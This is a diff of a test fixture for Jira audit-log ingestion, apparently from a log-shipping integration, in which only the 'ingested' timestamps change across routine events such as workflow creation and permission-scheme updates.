@@ -2377,7 +2377,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782600473Z", + "ingested": "2021-12-15T09:00:47.652649107Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10111\",\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Story Points\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Number Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":88000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2452,7 +2452,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782602907Z", + "ingested": "2021-12-15T09:00:47.652650084Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Done\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"Work has been completed on this issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":534000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2517,7 +2517,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782605406Z", + "ingested": "2021-12-15T09:00:47.652651150Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Won't Do\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"This issue won't be actioned.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2582,7 +2582,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782607818Z", + "ingested": "2021-12-15T09:00:47.652652085Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Duplicate\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"The problem is a duplicate of an existing issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":536000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2647,7 +2647,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:53.782610275Z", + "ingested": "2021-12-15T09:00:47.652653003Z", "original": "{\"affectedObjects\":[{\"id\":\"10003\",\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":537000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2712,7 +2712,7 @@ }, "event": { "action": "jira.auditing.workflow.created", - "ingested": "2021-12-08T14:50:53.782612699Z", + "ingested": "2021-12-15T09:00:47.652653935Z", "original": "{\"affectedObjects\":[{\"id\":\"Software Simplified Workflow for Project TEST\",\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\"}],\"auditType\":{\"action\":\"Workflow created\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.workflowtransition.transition\",\"key\":\"Transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"},{\"i18nKey\":\"common.words.status\",\"key\":\"Status\",\"to\":\"To Do, In Progress, Done\"},{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":710000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2792,7 +2792,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.created", - "ingested": "2021-12-08T14:50:53.782630912Z", + "ingested": "2021-12-15T09:00:47.652654905Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme created\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":732000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2862,7 +2862,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.added.to.project", - "ingested": "2021-12-08T14:50:53.782634945Z", + "ingested": "2021-12-15T09:00:47.652656639Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme added to project\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":746000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2925,7 +2925,7 @@ }, "event": { "action": "jira.auditing.filter.created", - "ingested": "2021-12-08T14:50:53.782637357Z", + "ingested": "2021-12-15T09:00:47.652658100Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Filter for TEST board\",\"type\":\"FILTER\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Filter created\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"filters\",\"categoryI18nKey\":\"jira.auditing.category.filters\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Filter for TEST board\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.owner\",\"key\":\"Owner\",\"to\":\"test.user\"},{\"from\":\"[]\",\"i18nKey\":\"common.concepts.shared.with\",\"key\":\"Shared with\",\"to\":\"[Project: test (VIEW)]\"},{\"from\":\"\",\"i18nKey\":\"jira.jql.query\",\"key\":\"JQL Query\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":887000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3020,7 +3020,7 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-08T14:50:53.782639717Z", + "ingested": "2021-12-15T09:00:47.652659106Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"},{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"}],\"auditType\":{\"action\":\"Board created\",\"actionI18nKey\":\"Board created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"boards\",\"categoryI18nKey\":\"jira.auditing.category.boards\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":72000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3083,7 +3083,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.created", - "ingested": "2021-12-08T14:50:53.782642184Z", + "ingested": "2021-12-15T09:00:47.652660127Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme created\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Default software scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Default scheme for Software projects.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":142000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3153,7 +3153,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782644542Z", + "ingested": "2021-12-15T09:00:47.652661046Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":151000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3223,7 +3223,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782646928Z", + "ingested": "2021-12-15T09:00:47.652661966Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":163000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3293,7 +3293,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782649355Z", + "ingested": "2021-12-15T09:00:47.652662884Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":165000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3363,7 +3363,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782651707Z", + "ingested": "2021-12-15T09:00:47.652663874Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assign Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":166000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3433,7 +3433,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782654026Z", + "ingested": "2021-12-15T09:00:47.652664802Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Resolve Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":168000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3503,7 +3503,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782656406Z", + "ingested": "2021-12-15T09:00:47.652665721Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Add Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":171000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3573,7 +3573,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782658787Z", + "ingested": "2021-12-15T09:00:47.652666640Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":173000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3648,7 +3648,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782661335Z", + "ingested": "2021-12-15T09:00:47.652667686Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assignable User\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":174000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3718,7 +3718,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782663714Z", + "ingested": "2021-12-15T09:00:47.652668617Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Close Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":176000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3788,7 +3788,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782666099Z", + "ingested": "2021-12-15T09:00:47.652669591Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":178000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3858,7 +3858,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782668427Z", + "ingested": "2021-12-15T09:00:47.652670546Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Work On Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":180000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3928,7 +3928,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782670787Z", + "ingested": "2021-12-15T09:00:47.652671486Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Link Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":182000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3998,7 +3998,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782673157Z", + "ingested": "2021-12-15T09:00:47.652672398Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Administer Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":184000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
